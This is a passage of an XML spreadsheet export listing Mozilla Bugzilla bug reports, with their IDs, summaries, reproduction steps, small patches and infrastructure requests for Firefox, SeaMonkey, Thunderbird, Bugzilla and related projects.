    <t xml:space="preserve">User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8) Gecko/20051111 Firefox/1.5
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8) Gecko/20051111 Firefox/1.5
The show_activity page for a bug does not use the bug summary in the page title or in the header.
Reproducible: Always
Actual Results:  
Changes made to ticket 555
    Activity log
    Ticket 555
Expected Results:  
Changes made to ticket 555 - SUMMARY 
    Activity log
    Ticket 555 - SUMMARY
</t>
  </si>
  <si>
    <t>dfc</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-527515</t>
  </si>
  <si>
    <t>Modify authz for /projects/mozilla.org changes</t>
  </si>
  <si>
    <t>Thanks to chizu's info from bug 526959 I'm ready to change how authz is done for /projects/mozilla.org.
Please make the following changes:
Modify:
[/projects/mozilla.org/trunk]
@mozilla-org-trunk = rw
to:
[/projects/mozilla.org/trunk]
@mozilla-org-trunk = rw
@webtools-dev = rw
Modify:
[/projects/mozilla.org/tags]
@mozilla-org-webmasters = rw
to:
[/projects/mozilla.org]
@mozilla-org-webmasters = rw
@webtools-dev = r
Remove:
[/projects/mozilla.org/branches/cvs]
steven@silverorange.com = rw
Add:
[/projects/mozilla.org/branches/staging]
@mozilla-org-trunk = rw
@webtools-dev = rw
Rename:
@mozilla-org-webmasters (note multiple locations)
to:
@mozilla-org-drivers
Rename:
@mozilla-org-trunk (note multiple locations)
to:
@mozilla-org-webmasters
Finally add steven@silverorange.com to the (new) @mozilla-org-webmasters</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-499806</t>
  </si>
  <si>
    <t>add simple query/enumerate w/ search term criteria filter to nsIMsgDatabase</t>
  </si>
  <si>
    <t>For js code that enumerates over a msg db looking for headers with certain properties like gloda the simple approach of getting an enumerator and looking at each hdr in turn can generate a lot of js garbage and produce a lot of calls across the xpcom boundary. For example when gloda is looking for unindexed messages in a folder it can instantiate every message header in the folder just to find a couple headers. If we can push the search down into the db code we can reduce the amount of js garbage and the number of calls across the xpcom boundary substantially.
I've gotten into situations where if I leave the system idle for a bit and try to use Thunderbird Thunderbird won't be responsive and it turns out js is garbage collecting msghdrs like crazy.</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-429339</t>
  </si>
  <si>
    <t>dm-wwwbuild01 / try server iSCSI migration</t>
  </si>
  <si>
    <t>Need to move dm-wwwbuild01 a VM from local disk to iSCSI storage and relocate
to pm-vmware03.  VM has three drives and only one of them is on local disk.  
Downtime ~2 hours.
I could optionally recreate a new disk and move ~6GB of content (/builds) to this new disk avoiding any actual downtime.   
Comments?</t>
  </si>
  <si>
    <t>NSPR-186599</t>
  </si>
  <si>
    <t>PR_LoadLibrary() doesn't support relative paths.</t>
  </si>
  <si>
    <t>I ask ccarlen to look at the failure of xpcom glue on OSX.  Apparently the
nspr's PR_LoadLibrary function doesn't handle relative paths correctly.  
ConradCarlen: heh - all this should take to fix is one call to realpath(3)</t>
  </si>
  <si>
    <t>NSS-45927</t>
  </si>
  <si>
    <t>new error code for RNG</t>
  </si>
  <si>
    <t>RNG needs to return a SEC_ERR_RNG_SEED_DATA when it is unable to provide
output due to a lack of sufficient seed data.</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-308737</t>
  </si>
  <si>
    <t>sort within group should be by date</t>
  </si>
  <si>
    <t>If you group by a non date field e.g. sender the sort within that group
should be by date.</t>
  </si>
  <si>
    <t>BUGZILLA.MOZILLA.ORG-491274</t>
  </si>
  <si>
    <t>Move RSS component from TB to MailNews Core and rename to Feed Reader</t>
  </si>
  <si>
    <t>Now the Newsblog extension is shared between Thunderbird and SeaMonkey the associated component (Thunderbird-&gt;RSS) needs to be moved to MailNews Core and renamed to Feed Reader. Existing bugs should all be moved to new product/component.
Old Product: Thunderbird
Old Component: RSS
New Product: MailNews Core
New Component: Feed Reader
New Description: For bugs in MailNews Feed Reader featureset
New Default Assignee: nobody@mozilla.org
New Default QA Contact: feed.reader@mail.bugs</t>
  </si>
  <si>
    <t>SEAMONKEY-491143</t>
  </si>
  <si>
    <t>View - Feed Message Body As - Default doesn't work</t>
  </si>
  <si>
    <t>newsblog's utils.js defines const RDF_NS but suite's bookmarks.js (as used by the Bookmark This Link context menu option) already declares it as a var. This means that an exception is thrown when the view as default code tries to dynamically import utils.js and therefore nothing gets shown at all.</t>
  </si>
  <si>
    <t>TOOLKIT-344029</t>
  </si>
  <si>
    <t>going back to home page in antiphishing breaks if multiple tab homepage is set</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8.1b1) Gecko/20060707 Firefox/2.0b1
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8.1b1) Gecko/20060707 Firefox/2.0b1
If you go to a site that is suspected for phishing and then click Get me out of here! to leave if your homepage contains tabs such as mine (http://slashdot.org/|http://digg.com/) then it will attempt to navigate to that site i.e. going to the nonexistent slashdot directory |http://digg.com instead of opening 2 tabs.
Reproducible: Always
Steps to Reproduce:
1. Make sure homepage is multi tab like http://slashdot.org/|http://digg.com/
2. Go to suspected phishing site such as Google's test site.
3. Click the Get me out of here! option.
Actual Results:  
It attempted to navigate to http://slashdot.org/|http://digg.com/ NOT to slashdot and digg in 2 separate tabs like they should.
Expected Results:  
Opened 2 tabs one with Digg and one with Slashdot.</t>
  </si>
  <si>
    <t>chaseslabaugh</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-342857</t>
  </si>
  <si>
    <t>Add support for XPath function 'current()'</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8.0.4) Gecko/20060508 Firefox/1.5.0.4
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8.0.4) Gecko/20060508 Firefox/1.5.0.4
This is defined in XForms 1.1 spec but currently implemented in formsPlayer and XSmiles 1.0 support.  I recommend tht Mozilla also implement this as it is near impossible to define bindings that work with many existing cross-referenced instances.  For example a shopping cart that has an instance that represents the catalog and another that represents the order.  What would be ideal is just to have references to the product in the catalog from the order.  Take for example this bind's calculate:
  &lt;xforms:bind nodeset=items/item/description 
     calculate=instance('inst_catalog')/product[@productId =       
                  current()/../@product]/description /&gt;  
This current() function is also implemented for XSLT.
Reproducible: Always</t>
  </si>
  <si>
    <t>CORE-195443</t>
  </si>
  <si>
    <t>xmlrpc broken stream closed pre-maturely</t>
  </si>
  <si>
    <t>xmlrpc is broken in the nightlies when using string as one of the parameters. I
expect its fall out from CString changes. Changing 
obj=obj.QueryInterface(Components.interfaces['nsISupports' + sType]) to
obj=obj.QueryInterface(Components.interfaces['nsISupportsC' + sType]) fixes the
issue. Of course you would need to add copy the code for the char type. 
http://lxr.mozilla.org/seamonkey/source/extensions/xml-rpc/src/nsXmlRpcClient.js#482
Maybe a more eligant fix would be to return CString at
http://lxr.mozilla.org/seamonkey/source/extensions/xml-rpc/src/nsXmlRpcClient.js#590
instead of just the stream but I didnt test this.
Another issue with the xmlrpc is that after calling the method it return an
error message:
Error! (80470002) Component returned failure code: 0x80470002
(NS_BASE_STREAM_CLOSED) [nsIScriptableInputStream.available]
I suspect the stream is closed pre-maturely. But I havent found time to
investigate this futher.</t>
  </si>
  <si>
    <t>tseng_mike</t>
  </si>
  <si>
    <t>SUPPORT.MOZILLA.ORG-415243</t>
  </si>
  <si>
    <t>Make dynamic variables localizable</t>
  </si>
  <si>
    <t>Dynamic variables (e.g. %%myVar%%) should be localizable This could then be used in the same way as DTDs were used in in-product help of Firefox 2.</t>
  </si>
  <si>
    <t>ADDONS.MOZILLA.ORG_GRAVEYARD-476026</t>
  </si>
  <si>
    <t>AMO tests cross the streams</t>
  </si>
  <si>
    <t>I mentioned this in bug 475994 but noticed it in another bug as well.  Running the tests is using real data.  That's not good at all.</t>
  </si>
  <si>
    <t>CORE-102240</t>
  </si>
  <si>
    <t>[XUL 1.0] update tab widget to use control element interface</t>
  </si>
  <si>
    <t>Like it says in the spec....</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-337277</t>
  </si>
  <si>
    <t>Typed characters appear twice/double after visiting site with Java applet</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Macintosh U Intel Mac OS X en-US rv:1.8.0.3) Gecko/20060502 Firefox/1.5.0.3
Build Identifier: Mozilla/5.0 (Macintosh U Intel Mac OS X en-US rv:1.8.0.3) Gecko/20060502 Firefox/1.5.0.3
After I visit
http://www.typingtest.com/test/default.asp
and start the typing test all characters typed in (for instance) the location bar appear twice. Seems to be related to bug 332579
I'm using this build:
http://jackassofalltrades.com/tmp/firefox-1503-332579v7.dmg
Reproducible: Always
Steps to Reproduce:
1. Open http://www.typingtest.com/test/default.asp
2. Start the test
3. Type in the location bar
Actual Results:  
Everything typed appears twice. I.e. 'http' becomes 'hhttttpp'</t>
  </si>
  <si>
    <t>bartvb</t>
  </si>
  <si>
    <t>MOZILLA_LABS_GRAVEYARD-470828</t>
  </si>
  <si>
    <t>selected tab completely opaque</t>
  </si>
  <si>
    <t>On Mac OS X the selected tab is completely opaque (and thus grey) which looks strange on top of the persona and next to unselected tabs that are partly transparent.</t>
  </si>
  <si>
    <t>CORE-395077</t>
  </si>
  <si>
    <t>Allow QueryService from any accessible to IAccessibleApplication</t>
  </si>
  <si>
    <t>JAWS expects to be able to QS from an IAccessible to an IAccessibleApplication.
Actually this should probably be on nsAccessNodeWrap. Our current QueryService impl should move there.</t>
  </si>
  <si>
    <t>SEAMONKEY-311098</t>
  </si>
  <si>
    <t>Port changes made in bug 251625  to xpfe/ (remove .part files when cancelling downloads)</t>
  </si>
  <si>
    <t>This bug never got fixed for SeaMonkey.</t>
  </si>
  <si>
    <t>BUGZILLA-370885</t>
  </si>
  <si>
    <t>Arrows in dependency graphs are drawn the wrong way</t>
  </si>
  <si>
    <t>Have a look at http://landfill.bugzilla.org/qa30/showdependencygraph.cgi?id=4202 and try to guess the bug blocking all others visible in this graph? 4205 as the base blocker? Good try but no! It's 4200! All arrows are the wrong way as they are supposed to show the flow to follow in order to fix these bugs (in this case from left to right).
All arrows should be reversed.</t>
  </si>
  <si>
    <t>SOCORRO-478772</t>
  </si>
  <si>
    <t>Crash report is shown twice when doing a search on Socorro</t>
  </si>
  <si>
    <t>+++ This bug was initially created as a clone of Bug #478706 +++
Mozilla/5.0 (Macintosh U Intel Mac OS X 10.5 en-US rv:1.9.1b3pre) Gecko/20090215 Shiretoko/3.1b3pre Ubiquity/0.1.5 ID:20090215020429
While creating the bug for the following crash I noticed that it appears twice in Socorro. If that happens for all crashes we get completely wrong crash statistics.
Crash report: bp-15d49b7d-8864-4597-930a-08a152090215
Here the search which results two crashes with the same crash id:
http://crash-stats.mozilla.com/report/list?product=Firefox&amp;branch=1.9.1&amp;version=Firefox%3A3.1b3pre&amp;query_search=signature&amp;query_type=exact&amp;query=_destroyJSDObject&amp;date=&amp;range_value=1&amp;range_unit=weeks&amp;do_query=1&amp;signature=_destroyJSDObject</t>
  </si>
  <si>
    <t>FIREFOX-411010</t>
  </si>
  <si>
    <t>Duplicate access keys in Views &gt; Sort in Places Organizer</t>
  </si>
  <si>
    <t>Created attachment 295607
Patch (v1)
Gavin: this is the next one in my duplicate access keys series.  :-)
The Views &gt; Sort menu in Places Organizer (a.k.a Library) contains two entries with access key (A): Sort by Added and A &gt; Z Sort Order.  Since (A) makes a lot of sense as the access key for A &gt; Z Sort Order (and contrasts the access key for _Z_ &gt; A Sort Order nicely) we'll keep it and change the access key for Sort by Added to (e).
This patch implements this change.</t>
  </si>
  <si>
    <t>OTHER_APPLICATIONS_GRAVEYARD-402388</t>
  </si>
  <si>
    <t>Fix vertical alignment of headers in report details</t>
  </si>
  <si>
    <t>Created attachment 287271
Patch
Vertical alignment should really be top in report details.  On windows this isn't such a big deal but on Mac OS X the build info can be rather long and with the header in the middle it looks pretty strange.</t>
  </si>
  <si>
    <t>RELEASE_ENGINEERING-432396</t>
  </si>
  <si>
    <t>Create two new linux buildbot slaves for Moz2/3.next pool</t>
  </si>
  <si>
    <t>Once the 2 VMs are created in bug#432392 we'll need to setup buildbot slaves
running on these VMs and add them to the buildbot master.cfg so they'll start
getting work assigned to them.</t>
  </si>
  <si>
    <t>SOCORRO-465676</t>
  </si>
  <si>
    <t>We should have a memcache stats page</t>
  </si>
  <si>
    <t>This page would show memcache statistics so we can view stats on how caches are being utilized.</t>
  </si>
  <si>
    <t>CALENDAR-390313</t>
  </si>
  <si>
    <t>Tooltip too narrow with some Windows themes text is truncated</t>
  </si>
  <si>
    <t>The Tooltip information does not show the whole descriptive text. The last 1 or 2 characters (depending on character width) of the longest line are missing in all views.
Tested in Lightning on WinXP with TB 2.0.0.5 Portable and Lightning 0.7pre Build 2007073105</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-196408</t>
  </si>
  <si>
    <t>aoltw.net - regression in table layout rendering</t>
  </si>
  <si>
    <t>see attached reduced testcase
The table layout renders correctly in commercial trunk build 2002-12-18-08trunk.
But the table looks distorted in recent commercial trunk builds :
2003-03-07-04trunk 
happening on all platforms</t>
  </si>
  <si>
    <t>WEBSITES_GRAVEYARD-629956</t>
  </si>
  <si>
    <t>getpersonas.com</t>
  </si>
  <si>
    <t>GetPersonas.com has started logging users out too often</t>
  </si>
  <si>
    <t>Not sure what changed but GetPersonas.com is logging people out a lot more frequently than it used to causing frustration for both contributors and users.  Various add-ons rely on users being able to stay logged into the site and for contributors/reviewers the frequent log outs make it difficult to keep an eye on things like the review queue.
Would be great if we could get the logout time set to what it used to be or at least a much longer period than it is now.</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-170107</t>
  </si>
  <si>
    <t>nsIRenderingContext::DrawImage method hiding warnings</t>
  </si>
  <si>
    <t>There are lots of method hiding warnings related to the various
nsIRenderingContext::DrawImage methods.  I'll attach a patch that fixes most of
them (although not all).</t>
  </si>
  <si>
    <t>RELEASE_ENGINEERING-509744</t>
  </si>
  <si>
    <t>mothball fast talos machines</t>
  </si>
  <si>
    <t>Now that a faster tp4 suite is running in Talos we're planning to disable the fast talos machines. Two points on this:
1) fast talos runs a *tiny* set of files in 15mins on mozilla-central mozilla-1.9.1 and mozilla-1.9.0 branches. fast talos uses these dedicated machines:
qm-plinux-fast01
qm-plinux-fast03
qm-plinux-fast04
qm-pmac-fast01
qm-pmac-fast03
qm-pmac-fast04
qm-pxp-fast01 
qm-pxp-fast03 
qm-pxp-fast04 
2) tp4 talos runs proper pageset in ~20mins on all branches. (tp4 on TryServer coming soon). tp4 talos uses the usual production pool of talos slaves.</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-198831</t>
  </si>
  <si>
    <t>Bad visualization with Mozilla</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.1) Gecko/20020919 Debian/1.1-1
Build Identifier: Mozilla/5.0 (X11 U Linux i686 en-US rv:1.1) Gecko/20020919 Debian/1.1-1
it's difficult to navigate in this site with mozilla
Reproducible: Always
Steps to Reproduce:
1.Open site
Actual Results:  
bad align of texts
Expected Results:  
perfect visualization</t>
  </si>
  <si>
    <t>difiado-lastpass</t>
  </si>
  <si>
    <t>BUGZILLA-394926</t>
  </si>
  <si>
    <t>Support for disabling extensions (aka plugins)</t>
  </si>
  <si>
    <t>You should be able to disable plugins individually even though they're installed in the extensions dir.
Probably the best way to accomplish this is to check for the existence of a file called disabled in that plugin's base dir (that is extensions/pluginname/). We can't use the DB because plugins sometimes have to work before the DB even exists.
We could also have an admin page that would enable or disable these plugins (which would be pretty easy to write.)</t>
  </si>
  <si>
    <t>CORE-480185</t>
  </si>
  <si>
    <t>XPConnect shouldn't poke JS objects manually should use JSAPI</t>
  </si>
  <si>
    <t>Must remove OBJ_GET_PROPERTY and friends in favor of JSAPI calls so that we can trace reliably.</t>
  </si>
  <si>
    <t>CORE-206696</t>
  </si>
  <si>
    <t>Double-struck identifiers are inconsistently styled in MathML</t>
  </si>
  <si>
    <t>When I put double-struck uppercase letters in  tags some are italic and 
some are not.  In particular CHNPQRZ are upright and the others are italic.
This might be related to some other MathML font problem but I didn't see 
anything obvious.
Of course most mathematicians prefer these characters to be upright.  But 
that's not what the MathML spec wants to see.</t>
  </si>
  <si>
    <t>INSTANTBIRD-955454</t>
  </si>
  <si>
    <t>Highlight broken by tabbrowser changes</t>
  </si>
  <si>
    <t>*** Original post on bio 2017 at 2013-06-27 10:52:00 UTC ***
Timestamp: 06/27/2013 11:22:06 AM
Error: TypeError: tabbrowser is null
Source File: chrome://highlight/content/highlight.js
Line: 43
Should be fixed by getBrowser -&gt; getTabBrowser.</t>
  </si>
  <si>
    <t>clokep</t>
  </si>
  <si>
    <t>aleth</t>
  </si>
  <si>
    <t>BUGZILLA-356807</t>
  </si>
  <si>
    <t>CSV export expose text/plain as MIME content type</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 fr-FR rv:1.7.10) Gecko/20050717 Firefox/1.0.6
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 fr-FR rv:1.7.10) Gecko/20050717 Firefox/1.0.6
When exporting a buglist as a CSV file Bugzilla report text/plain as MIME type.
So my web browser saves it as bug.csv.txt and do not propose to open it with excel.
The right MIME type for CSV files is text/csv instead of text/plain
Here is my proposed patch :
*** Bugzilla/Constants.pm       14 Oct 2006 20:30:54 -0000      1.34.2.1
--- Bugzilla/Constants.pm       16 Oct 2006 12:00:37 -0000
***************
*** 153159 ****
     atom=&gt; application/atom+xml 
     xml =&gt; application/xml 
     js  =&gt; application/x-javascript 
!    csv =&gt; text/plain 
     png =&gt; image/png 
     ics =&gt; text/calendar 
    }
--- 153159 ----
     atom=&gt; application/atom+xml 
     xml =&gt; application/xml 
     js  =&gt; application/x-javascript 
!    csv =&gt; text/csv 
     png =&gt; image/png 
     ics =&gt; text/calendar 
    }
Reproducible: Always
Steps to Reproduce:
1. Search for bugs 
2. In buglist choose CSV
3. Your web browser propose to open the file with a text editor or to save it</t>
  </si>
  <si>
    <t>david.geldreich</t>
  </si>
  <si>
    <t>FIREFOX-468661</t>
  </si>
  <si>
    <t>Noia 2.0 (eXtreme) addon not available/working for Firefox 3.5</t>
  </si>
  <si>
    <t>currently compatible with 3.1a2pre.  It would be great to see this one moved up to recent versions of 3.1.
Kongkeat any updates on when updates might be available.  Mark also cc'ed you since you were helpful tracking down status for 3.0.</t>
  </si>
  <si>
    <t>kasteo</t>
  </si>
  <si>
    <t>BUGZILLA-192516</t>
  </si>
  <si>
    <t>Move loose .pm files into the Bugzilla directory</t>
  </si>
  <si>
    <t>The following files belong in the Bugzilla directory and the internal packages
should be renamed appropriately:
Attachment.pm
Bug.pm
RelationSet.pm
Token.pm
All references to these packages from everywhere else in Bugzilla would need to
be modified appropriately.</t>
  </si>
  <si>
    <t>CORE-670235</t>
  </si>
  <si>
    <t>Remove nsIDOMWindowInternal</t>
  </si>
  <si>
    <t>Created attachment 544894
Patch v1
Reviewer appointed by fair dice roll.</t>
  </si>
  <si>
    <t>CORE-700856</t>
  </si>
  <si>
    <t>Move styles from {MediaImageVideo}Document to external stylesheets</t>
  </si>
  <si>
    <t>Before we fix bug 376997 we should move the styles currently found within MediaDocument.cpp ImageDocument.cpp and VideoDocument.cpp to an external stylesheet.
The external stylesheets will be introduced by bug 700854.</t>
  </si>
  <si>
    <t>BUGZILLA-302083</t>
  </si>
  <si>
    <t>Have bugzilla automatically convert uncompressed bmp attachments to png or some other compressed format</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.7.8) Gecko/20050511 Firefox/1.0.4
Build Identifier: 
We have been running into this problem with our developers since they use MS
paint to capture their screenshots which they then upload to bugzilla. These
files often start at 4 MB and go up from there and it would be just as good for
a screenshot if it were to use png or gif. 
Reproducible: Always</t>
  </si>
  <si>
    <t>FIREFOX-362627</t>
  </si>
  <si>
    <t>Keyboard shortcuts to close Mac toolbar customization sheet don't work</t>
  </si>
  <si>
    <t>The Mac customization sheet *would* be closed by VK_ESCAPE VK_RETURN or VK_ENTER except they are calling window.close() which doesn't close that not-very-window rather than gCustomizeToolbarSheet.done() which does. I wouldn't worry too much about it (I was just going to fix it in bug 341246 as a side-effect) except that playing with bug 174518 made me notice that it's not too hard to get it in a state where the Done button doesn't show up and it would be nice if hitting Esc at that point got rid of it which makes me think we probably want it for 1.8.1.2.</t>
  </si>
  <si>
    <t>CORE-468568</t>
  </si>
  <si>
    <t>[@font-face] printing pages with downloadable fonts doesn't render all fonts on the page</t>
  </si>
  <si>
    <t>It appears that in some cases fonts on a page containing a number of downloadable fonts doesn't print correctly the printed page is rendered using fallback fonts instead.
Steps:
1. Open URL
2. Wait for the page to finish loading
3. Select Print
4. Click on the Preview button
Result: most fonts on the page render some do not</t>
  </si>
  <si>
    <t>SEAMONKEY-78659</t>
  </si>
  <si>
    <t>visiting www.playboy.com crashes mozilla. Sucks eh</t>
  </si>
  <si>
    <t>Linux build 2001050221 (tried rm'ing the NewCache directory but to no avail)
steps to reproduce.
1) start mozilla
2) type in www.playboy.com into the urlbar
3) sip on coffee and set your fingers on your boss key (just in case it
actually loads.
4) press enter..
should crash mozilla successfully.. 
btw there is a related bug to this 78139 if anybody wants to take a look at
it its unconfirmed so far but its a nasty one.</t>
  </si>
  <si>
    <t>BUGZILLA-524065</t>
  </si>
  <si>
    <t>Template Hook for attachment creating and editing at end</t>
  </si>
  <si>
    <t>Created attachment 407956
v1
Here's a template hook for attachment/create after the table is created. (I'm using it to insert some JavaScript.)
This is a super-simple one-line patch.</t>
  </si>
  <si>
    <t>MOZILLA_LOCALIZATIONS-254325</t>
  </si>
  <si>
    <t>[german help] Translate cs_nav_dialog.xhtml to german</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.8a3) Gecko/20040728 Mnenhy/0.6.0.104
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.8a3) Gecko/20040728 Mnenhy/0.6.0.104
File hat eigentlich keinen Inhalt fehlt aber im heutigen XPI.
Reproducible: Always
Steps to Reproduce:</t>
  </si>
  <si>
    <t>CORE-138142</t>
  </si>
  <si>
    <t>property margin not recognized if property display dynamically set</t>
  </si>
  <si>
    <t>From Bugzilla Helper:
User-Agent: Mozilla/5.0 (Windows U WinNT4.0 en-US rv:0.9.9) Gecko/20020311
BuildID:    2002031104
Look at this source:
#a #b
{
 display: none
}
&lt;!--
function chg(id)
{
 var el = document.getElementById(id)
 el.style.display = (el.style.display == '' || el.style.display == 'none') ?
'block' : 'none'
}
//--&gt;
A B
Example A
Example B
If the document is shown you see first only A and B. Click on A you see
Example A click on B you see Example B. Between Example A and Example
B is a distance (from margin).
Reload the document.
Do the same as before but first B then A. There is no distancs between
Example A and Example B.
If you omit the tags  and  everything works fine.
Reproducible: Always
Steps to Reproduce:
1. If the document ist shown you see first only A and B. Click on A you
see Example A click on B you see Example B. Between Example A and
Example B is a distance (from margin).
2. Reload the document.
3. Do the same as before but first B then A. There is no distancs between
Example A and Example B.
Actual Results:  See description and the reproduce steps.
Expected Results:  Same behaviour without consideration of the order of clicking.</t>
  </si>
  <si>
    <t>layout.block-and-inline</t>
  </si>
  <si>
    <t>dietmar.rabich</t>
  </si>
  <si>
    <t>ADD-ON_SDK_GRAVEYARD-733175</t>
  </si>
  <si>
    <t>Don't look for MPL2 headers in generated test assets</t>
  </si>
  <si>
    <t>Line over here https://github.com/mozilla/addon-sdk/pull/355/files#L1R57 triggered bug 733173 which I guess did not properly cleaned up it's generated docs that caused MPL2 Header tests to fail:
The following files are missing an MPL2 header:
python-lib/cuddlefish/tests/static-files/sdk-docs/doc/static-files/js/jquery.js
python-lib/cuddlefish/tests/static-files/sdk-docs/doc/static-files/syntaxhighlighter/scripts/shBrushCss.js
python-lib/cuddlefish/tests/static-files/sdk-docs/doc/static-files/syntaxhighlighter/scripts/shBrushJScript.js
python-lib/cuddlefish/tests/static-files/sdk-docs/doc/static-files/syntaxhighlighter/scripts/shBrushXml.js
python-lib/cuddlefish/tests/static-files/sdk-docs/doc/static-files/syntaxhighlighter/scripts/shCore.js
Not sure if that's issue on the one test or another but we should fix the issues to make sure we don't see falsy failures.</t>
  </si>
  <si>
    <t>warner-bugzilla</t>
  </si>
  <si>
    <t>rFobic</t>
  </si>
  <si>
    <t>CORE-522796</t>
  </si>
  <si>
    <t>[OOPP] Implement NPN_SetException</t>
  </si>
  <si>
    <t>Implement NPN_SetException.</t>
  </si>
  <si>
    <t>malek</t>
  </si>
  <si>
    <t>WEBTOOLS_GRAVEYARD-474724</t>
  </si>
  <si>
    <t>Tinderbox log output shouldn't suppress line buffering</t>
  </si>
  <si>
    <t>Last I checked Tinderbox's log output was sending data line-by-line (ie each line in a separate packet). This results in needless network and parser overhead.
I'm guessing that sticking a $| = 0 somewhere would fix it. Basically the reverse of http://perl.plover.com/FAQs/Buffering.html</t>
  </si>
  <si>
    <t>MOZILLA_MESSAGING-484232</t>
  </si>
  <si>
    <t>add rebron feed to planet momo</t>
  </si>
  <si>
    <t>http://www.rebron.org/category/mozilla-messaging/feed/</t>
  </si>
  <si>
    <t>SEAMONKEY-407744</t>
  </si>
  <si>
    <t>Get rid of useless toolbar_button_box</t>
  </si>
  <si>
    <t>Some of our windows have an extra box wrapping their toolbar buttons which needs to be removed if we are to make them customisable.</t>
  </si>
  <si>
    <t>BUGZILLA-477601</t>
  </si>
  <si>
    <t>Adapt Bug.search to use Search.pm</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.9.0.6) Gecko/2009020410 Fedora/3.0.6-1.fc9 Firefox/3.0.6
Build Identifier: 
Bug.search should be adapted to use Search.pm so that eventually it can become a complete search with the full functionality of query.cgi 
Reproducible: Always</t>
  </si>
  <si>
    <t>rosie.clarkson</t>
  </si>
  <si>
    <t>CORE-90039</t>
  </si>
  <si>
    <t>table cell entry text overlaps frame border</t>
  </si>
  <si>
    <t>From Bugzilla Helper:
User-Agent: Mozilla/5.0 (X11 U Linux i686 en-US rv:0.9.2) Gecko/20010701
BuildID:    2001070116
In the URL mentioned above in the rightmost column (among others)
the cell entries overlap the rightmost frame border which looks
suboptimal. A sample screenshot of the incorrect rendering is available
at http://web.mit.edu/kolya/tmp/mozilla-table-bug.gif.
Reproducible: Always
Steps to Reproduce:
1. Load page
2. Look at table :-)
Actual Results:  The cell entries overlapped the borders
Expected Results:  Entries should be confined to their cells and not be
allowed to escape :-)</t>
  </si>
  <si>
    <t>kolya</t>
  </si>
  <si>
    <t>SEAMONKEY-242905</t>
  </si>
  <si>
    <t>remove nsXIEngine::ParseURL</t>
  </si>
  <si>
    <t>nsXIEngine calls nsHTTPConn::ParseURL but not its own version of the function
with the same name.</t>
  </si>
  <si>
    <t>TAMARIN_GRAVEYARD-412464</t>
  </si>
  <si>
    <t>Infrastructure for int uint double literals</t>
  </si>
  <si>
    <t>Just expanding ast-encode.es ast-decode.es and ast.es to handle these correctly.  Then fixing the parser to generate them instead of LiteralDecimal (simplifies the back end).</t>
  </si>
  <si>
    <t>SEAMONKEY-147448</t>
  </si>
  <si>
    <t>Mailnews theme: duplicate images / css rules</t>
  </si>
  <si>
    <t>In the Modern theme's CSS there are a lot of rules for watched/ignored threads
and images that are duplicates. We could optimize this a bit.
For example:
treechildren:-moz-tree-image(news threadCol container hasUnread watch open) {
  list-style-image: url(chrome://messenger/skin/icons/thread-new-open-eye.gif)
}
uses the exact same image as:
treechildren:-moz-tree-image(news threadCol container hasUnread watch) {
  list-style-image: url(chrome://messenger/skin/icons/thread-new-closed-eye.gif)
}
So basically we make no distinction between open and closed threads in the
watched/ignored icon which makes sense so let's remove the bloat.
BTW I haven't investigated if Classic is optimizable too.</t>
  </si>
  <si>
    <t>CORE-512060</t>
  </si>
  <si>
    <t>Casing errors in firefox/source/intl/uconv/src/charsetalias.properties prevent encoding aliases from working</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Macintosh U PPC Mac OS X 10_5_8 en-us) AppleWebKit/531.9 (KHTML like Gecko) Version/4.0.3 Safari/531.9
Build Identifier: 
 clearly states that the
â€œkey should always be in lower case asciiâ€ which is not the case for the following:
csIBM866
csIBM850
csIBM852
csIBM855
csIBM857
csIBM862
csIBM864
csMacintosh
As one would expect these aliases do not work. Converting them to lowercase would presumably fix the problem.
Reproducible: Always</t>
  </si>
  <si>
    <t>pub-mozilla</t>
  </si>
  <si>
    <t>SEAMONKEY-146194</t>
  </si>
  <si>
    <t>sidebar search's next button does not reset count with a new search</t>
  </si>
  <si>
    <t>From Bugzilla Helper:
User-Agent: Mozilla/5.0 (X11 U Linux i686 en-US rv:1.0rc2) Gecko/20020510
BuildID:    2002051009
Searching a website (like google) with the search sidebar yields results.  The
sidebar has a next button that shows the next results.  Say you push it until
the results shown are numbers 61-80.  Now you do another search from the
sidebar and it shows results 1-20.  If you push next it SHOULD show you numbers
21-40 however it shows you numbers 81-100.  The count should be reset with each
new search.
Reproducible: Always
Steps to Reproduce:
1.Search using google in the search sidebar for boogers
2.Press next
3.Search using google in the search sidebar for boogers are nice to eat
4.Press next
Actual Results:  The page shown is google results from 41-50
Expected Results:  It should have shown pages 21-50 according to the google.src
Sherlock2 specification
Note that there is a bug in the google.src specification as well in that the
increment for next and previous are both 20 while google only searches 10 at a
time.</t>
  </si>
  <si>
    <t>INFRASTRUCTURE_&amp;_OPERATIONS-522581</t>
  </si>
  <si>
    <t>buildslave reboots 20091015</t>
  </si>
  <si>
    <t>talos-rev2-linux06</t>
  </si>
  <si>
